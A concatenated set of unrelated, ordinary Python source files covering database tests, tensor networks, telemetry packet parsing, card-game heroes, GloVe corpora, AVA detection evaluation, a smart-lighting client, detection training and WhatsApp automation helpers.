self.table_ts_nolog, dict((k, 2 if k <= key_range / 4 else 1)
for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[(1 + key_range / 2):]), missing=True)
# For logged tables behavior changes for rollback_to_stable based on
# whether connection level logging is enabled or not.
if self.using_log == True:
# When log is enabled, none of the keys will be rolled back.
# Check that we see all the keys
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 2) for k in keys[:]))
else:
# When log is disabled, keys will be rolled back till stable_timestamp
# Check that we see only half key ranges in timestamp tables. we see
# the updated value (i.e. 2) for the first quarter keys and old values
# (i.e. 1) for the second quarter keys.
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, (2 if k <= key_range / 4 else 1))
for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[(1 + key_range / 2):]), missing=True)
if __name__ == '__main__':
wttest.run()
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
return _COMPONENTS[name]
|
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
"""Image data
.. py:attribute:: segment_length
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Less than one complete image
* 1 - One complete image
* 2 - Multiple complete images
* 3 - Multiple incomplete images
.. py:attribute:: parts
Indicates which piece[s] are of the frame are contained in the packet:
"""
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
"""Still imagery
.. py:attribute:: format
* 0 - MIL-STD-2500 National Imagery Transmission Format
* 1 - JPEG File Interchange Format
* 2 - JPEG 2000 (ISO/IEC 154444-1)
* 3 - Portable Network Graphics Format (PNG)
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image
* 1 - Contains one complete image
* 2 - Contains multiple complete images
* 3 - Contains multiple incomplete messages
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains multiple complete messages
* 3 - Contains both first and last segment of image
"""
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
"""Dynamic Imagery
.. py:attribute:: format
Refer to chapter 10 standard
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image (segment)
* 1 - Contains one complete image
* 2 - Contains multiple complete images
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains last segment of image
"""
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
|
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
|
# Cooccurrence matrix construction tools
# for fitting the GloVe model.
import numpy as np
try:
# Python 2 compat
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
"""
Class for constructing a cooccurrence matrix
from a corpus.
A dictionry mapping words to ids can optionally
be supplied. If left None, it will be constructed
from the corpus.
"""
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
"""
Perform a pass through the corpus to construct
the cooccurrence matrix.
Parameters:
- iterable of lists of strings corpus
- int window: the length of the (symmetric)
context window used for cooccurrence.
- bool ignore_missing: whether to ignore words missing from
the dictionary (if it was supplied).
Context window distances will be preserved
even if out-of-vocabulary words are
ignored.
If False, a KeyError is raised.
"""
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
|
r"""Compute action detection performance for the AVA dataset.
Please send any questions about this code to the Google Group ava-dataset-users:
https://groups.google.com/forum/#!forum/ava-dataset-users
Example usage:
python -O get_ava_performance.py \
-l ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt \
-g ava_val_v2.1.csv \
-e ava_val_excluded_timestamps_v2.1.csv \
-d your_results.csv
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
"""Returns a unique identifier for a video id & timestamp."""
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
"""Loads boxes and class labels from a CSV file in the AVA format.
CSV file format described at https://research.google.com/ava/download.html.
Args:
csv_file: A file object.
class_whitelist: If provided, boxes corresponding to (integer) class labels
not in this set are skipped.
capacity: Maximum number of labeled boxes allowed for each example.
Default is 0 where there is no limit.
Returns:
boxes: A dictionary mapping each unique image key (string) to a list of
boxes, given as coordinates [y1, x1, y2, x2].
labels: A dictionary mapping each unique image key (string) to a list of
integer class lables, matching the corresponding box in `boxes`.
scores: A dictionary mapping each unique image key (string) to a list of
score values lables, matching the corresponding label in `labels`. If
scores are not provided in the csv, then they will default to 1.0.
"""
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
assert len(row) in [7, 8], "Wrong number of columns: " + row
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
# Evaluation API assumes boxes with descending scores
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
"""Reads a CSV file of excluded timestamps.
Args:
exclusions_file: A file object containing a csv of video-id,timestamp.
Returns:
A set of strings containing excluded image keys, e.g. "aaaaaaaaaaa,0904",
or an empty set if exclusions file is None.
"""
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
assert len(row) == 2, "Expected only 2 columns, got: " + row
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
"""Reads a labelmap without the dependency on protocol buffers.
Args:
labelmap_file: A file object containing a label map protocol buffer.
Returns:
labelmap: The label map in the form used by the object_detection_evaluation
module - a list of {"id": integer, "name": classname } dicts.
class_ids: A set containing all of the valid class id integers.
"""
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
"""Runs evaluations given input files.
Args:
labelmap: file object containing map of labels to consider, in pbtxt format
groundtruth: file object
detections: file object
exclusions: file object or None.
"""
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
"""Parses command-line flags.
Returns:
args: a named tuple containing three file objects args.labelmap,
args.groundtruth, and args.detections.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
|
from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
|
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
"""Base object for Noon Home."""
@property
async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
if self._spaces is None:
await self._refreshDevices()
return self._spaces
@property
async def lines(self) -> typing.Dict[Guid, NoonLine]:
if self._lines is None:
await self._refreshDevices()
return self._lines
@property
def session(self) -> ClientSession:
return self._session
@property
def event_stream_connected(self) -> bool:
return self._event_stream_connected
@property
def event_stream_error(self) -> str:
return self._event_stream_error
def __init__(self, session, username, password):
"""Create a PyNoone object.
:param username: Noon username
:param password: Noon password
:returns PyNoon base object
"""
# Properties
self._spaces = None
self._lines = None
self._scenes = None
self._all_entities = {}
self._endpoints = {}
self._event_stream_connected = False
self._event_stream_error = None
# Store credentials
self._username = username
self._password = password
self._token = None
self._token_expires = None
# AIOHTTP
self._session = session
self._websocket_task = None
async def authenticate(self) -> bool:
"""Authenticate with Noon and store the authentication token."""
"""Reuse token if we have one."""
if self._token is not None and self._token_expires > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return True
""" Authenticate user, and get tokens """
_LOGGER.debug("No valid token or token expired. Authenticating...")
payload = {
"email": self._username,
"password": self._password
}
async with self.session.post(LOGIN_URL, json=payload) as login_response:
parsed_response = await login_response.json()
_LOGGER.debug("Response: {}".format(parsed_response))
# Invalid response from noon
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from authentication was not a dictionary")
raise NoonProtocolError
# Single error from noon
if "error" in parsed_response.keys():
raise NoonAuthenticationError
# Errors from Noon
if parsed_response.get("errors") is not None:
_LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
raise NoonUnknownError
# Must have a token and lifetime
try:
self._token = parsed_response["token"]
self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
_LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
except KeyError:
_LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
raise NoonUnknownError
# Get endpoints if needed
await self._refreshEndpoints()
# Success
return True
async def open_eventstream(self, event_loop=None):
"""Create a background task for the event stream."""
if event_loop is None:
_LOGGER.debug("Using main asyncio event loop")
event_loop = asyncio.get_running_loop()
assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
self._websocket_task = event_loop.create_task(self._internal_eventstream())
async def close_eventstream(self):
"""Close the event stream background task."""
if self._websocket_task is not None and not self._websocket_task.cancelled():
_LOGGER.debug("Canceling websocket task")
self._websocket_task.cancel()
async def _internal_eventstream(self):
"""Loop for connecting to the Noon notification stream."""
keep_looping = True
while keep_looping:
try:
await self.authenticate()
timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
_LOGGER.debug("Connecting to notification stream...")
async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
_LOGGER.debug("Connected to notification stream")
self._event_stream_connected = True
self._event_stream_error = None
async for msg in ws:
if msg.type == WSMsgType.TEXT:
_LOGGER.debug("Got websocket message: {}".format(msg.data))
parsed_data = json.loads(msg.data)
changes = parsed_data["data"].get("changes", [])
for change in changes:
await self._handle_change(change)
elif msg.type == WSMsgType.CLOSED:
_LOGGER.error("Socket closed")
raise NoonProtocolError("Notification stream closed unexpectedly")
elif msg.type == WSMsgType.ERROR:
_LOGGER.error("Websocket error")
raise NoonProtocolError("Unknown error on notification stream")
except CancelledError:
_LOGGER.debug("Loop canceled.")
self._event_stream_error = "Canceled"
keep_looping = False
except WSServerHandshakeError:
_LOGGER.error("Loop Fatal: Handshake error")
self._event_stream_error = "Handshake Error"
keep_looping = False
except Exception:
_LOGGER.exception("Loop Fatal: Generic exception during event loop")
self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
keep_looping = False
finally:
_LOGGER.debug("Event stream is disconnected.")
self._event_stream_connected = False
async def _handle_change(self, change):
"""Process a change notification."""
guid = change.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(change))
return
affected_entity = self._all_entities.get(guid, None)
if affected_entity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
changed_fields = change.get("fields", [])
return await affected_entity.handle_update(changed_fields)
def get_entity(self, entity_id: Guid) -> NoonEntity:
return self._all_entities.get(entity_id, None)
async def _refreshEndpoints(self):
"""Update the noon endpoints for this account"""
if len(self._endpoints) > 0:
return
await self.authenticate()
async with self.session.get(DEX_URL, headers={
"Authorization": "Token {}".format(self._token)
}) as login_response:
parsed_response = await login_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Store
try:
self._endpoints = parsed_response["endpoints"]
except KeyError:
_LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
raise NoonUnknownError
def _registerEntity(self, entity: NoonEntity):
""" EVERYTHING """
self._all_entities[entity.guid] = entity
""" SPACE """
if isinstance(entity, NoonSpace):
existingEntity = self._spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._spaces[entity.guid] = entity
""" LINE """
if isinstance(entity, NoonLine):
existingEntity = self._lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._lines[entity.guid] = entity
""" SCENE """
if isinstance(entity, NoonScene):
existingEntity = self._scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._scenes[entity.guid] = entity
async def _refreshDevices(self):
"""Load the devices (spaces/lines) on this account."""
# Reset cache
self._spaces = {}
self._scenes = {}
self._lines = {}
# Authenticate if needed
await self.authenticate()
# Load the device details
url = "{}/api/query".format(self._endpoints["query"])
headers = {
"Authorization": "Token {}".format(self._token),
"Content-Type": "application/graphql"
}
data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
async with self.session.post(url, headers=headers, data=data) as discovery_response:
parsed_response = await discovery_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Parse spaces
for space in parsed_response["spaces"]:
this_space = await NoonSpace.from_json(self, space)
_LOGGER.debug("Discovered space {}".format(this_space.name))
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Modified by BaseDetection, Inc. and its affiliates. All Rights Reserved
"""
Detection Training Script.
This scripts reads a given config file and runs the training or evaluation.
It is an entry point that is made to train standard models in cvpods.
In order to let one script support training of many models,
this script contains logic that are specific to these built-in models and therefore
may not be suitable for your own project.
For example, your research project perhaps only needs a single "evaluator".
Therefore, we recommend you to use cvpods as an library and take
this file as an example of how to use the library.
You may want to write your own script with your datasets and other customizations.
"""
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config # noqa: E402
from net import build_model # noqa: E402
class Trainer(DefaultTrainer):
"""
We use the "DefaultTrainer" which contains pre-defined default logic for
standard training workflow. They may not work for you, especially if you
are working on a new research project. In that case you can use the cleaner
"SimpleTrainer", or write your own training loop. You can use
"tools/plain_train_net.py" as an example.
"""
@classmethod
def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
"""
Create evaluator(s) for a given dataset.
This uses the special metadata "evaluator_type" associated with each builtin dataset.
For your own dataset, you can simply create an evaluator manually in your
script and do not have to worry about the hacky if-else logic here.
"""
dump_train = config.GLOBAL.DUMP_TRAIN
return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("cvpods.trainer")
# In the end of training, run an evaluation with TTA
# Only support some R-CNN models.
logger.info("Running inference with test-time augmentation ...")
model = GeneralizedRCNNWithTTA(cfg, model)
res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def stage_main(args, cfg, build):
cfg.merge_from_list(args.opts)
cfg, logger = default_setup(cfg, args)
model_build_func = build
"""
If you'd like to do anything fancier than the standard training logic,
consider writing your own training loop or subclassing the trainer.
"""
trainer = Trainer(cfg, model_build_func)
trainer.resume_or_load(resume=args.resume)
if args.eval_only:
DetectionCheckpointer(
trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume)
res = Trainer.test(cfg, trainer.model)
if comm.is_main_process():
verify_results(cfg, res)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, trainer.model))
return res
# check wheather worksapce has enough storeage space
# assume that a single dumped model is 700Mb
file_sys = os.statvfs(cfg.OUTPUT_DIR)
free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
if eval_space_Gb > free_space_Gb:
logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
if cfg.TEST.AUG.ENABLED:
trainer.register_hooks(
[hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
)
trainer.train()
if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
# convert last ckpt to pretrain format
convert_to_pretrained_model(
input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
)
def convert_to_pretrained_model(input, save_path):
obj = torch.load(input, map_location="cpu")
obj = obj["model"]
newmodel = {}
for k, v in obj.items():
if not k.startswith("encoder_q.") and not k.startswith("network"):
continue
old_k = k
if k.startswith("encoder_q."):
k = k.replace("encoder_q.", "")
elif k.startswith("network"):
k = k.replace("network.", "")
print(old_k, "->", k)
newmodel[k] = v.numpy()
res = {
"model": newmodel,
"__author__": "MOCO" if k.startswith("encoder_q.") else "CLS",
"matching_heuristics": True
}
with open(save_path, "wb") as f:
pkl.dump(res, f)
def main(args):
if isinstance(config, list):
assert isinstance(build_model, list) and len(config) == len(build_model)
for cfg, build in zip(config, build_model):
stage_main(args, cfg, build)
else:
stage_main(args, config, build_model)
if __name__ == "__main__":
args = default_argument_parser().parse_args()
if isinstance(config, list):
assert len(config) > 0
print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
config[0].link_log()
else:
print("soft link to {}".format(config.OUTPUT_DIR))
config.link_log()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
|
# Generated by Django 3.2.3 on 2021-05-17 16:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0072_alter_product_region'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='name_lt',
new_name='name',
),
]
|
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
# region TUTORIAL
'''
Go to region 'FOR SCRIPTING' and use the methods in your script!
EXAMPLE OF USAGE:
from wplay.pyppeteerUtils import pyppeteerConfig as pypConfig
from wplay.pyppeteerUtils import pyppeteerSearch as pypSearch
async def my_script(target):
pages, browser = wait pyp.configure_browser_and_load_whatsapp(pypConfig.websites['whatsapp'])
await pypSearch.search_for_target_and_get_ready_for_conversation(pages[0], target)
message = pypSearch.ask_user_for_message_breakline_mode()
await pypSearch.send_message(pages[0], message)
message2 = pypSearch.ask_user_for_message()
await pypSearch.send_message(pages[0], message2)
'''
# endregion
# region IMPORTS
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
# endregion
# region FOR SCRIPTING
async def search_and_select_target(page, target, hide_groups=False):
await __open_new_chat(page)
await __type_in_new_chat_search_bar(page, target)
contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
contact_titles_unchecked, contact_list_elements_unchecked)
group_list_unchecked = __zip_group_titles_and_elements_unchecked(
group_titles_unchecked, group_list_elements_unchecked)
contact_tuple = __check_contact_list(target, contact_list_unchecked)
group_tuple = __check_group_list(target, group_list_unchecked)
target_tuple = __get_target_tuple(contact_tuple, group_tuple)
__print_target_tuple(target_tuple)
target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
await __navigate_to_target(page, choosed_target)
target_focused_title = await __get_focused_target_title(page, target)
if any(choosed_target[0] in i for i in contact_tuple):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_focused_title)
__check_target_focused_title(page, target, target_focused_title)
await __wait_for_message_area(page)
return target_focused_title
async def search_and_select_target_without_new_chat_button(page,target, hide_groups=False):
await __type_in_chat_or_message_search(page,target)
chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list,hide_groups)
target_tuple = (contact_name_index_tuple_list,group_name_index_tuple_list)
__print_target_tuple(target_tuple)
target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
#chosen_target will be a tuple (a,b) such that a is the name of the target and b is the
#index of that element in chats_messages_groups_elements_list
chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
await __open_selected_chat(chosen_target[1],chats_messages_groups_elements_list)
target_name = chosen_target[0]
if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_name)
await __wait_for_message_area(page)
return target_name
# endregion
